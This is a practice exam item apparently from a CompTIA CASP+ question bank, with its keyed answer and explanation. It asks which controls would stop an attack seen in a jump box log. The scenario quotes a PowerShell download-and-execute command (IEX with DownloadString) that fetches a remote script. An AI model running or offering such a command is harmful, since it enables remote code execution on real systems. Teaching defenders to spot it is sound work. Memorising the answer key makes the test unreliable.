CompTIA CASP+ (CAS-004) — Question 59

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?

Answer options

• A. Antivirus and UEBA
• B. Reverse proxy and sandbox
• C. EDR and application approved list
• D. Forward proxy and MFA

Correct answer: C

Explanation

The correct answer is C because EDR (Endpoint Detection and Response) would monitor and respond to malicious activity on endpoints, while an application approved list would restrict which applications can run, preventing unauthorized scripts. Options A, B, and D do not specifically address the detection and prevention of the PowerShell command execution seen in the logs.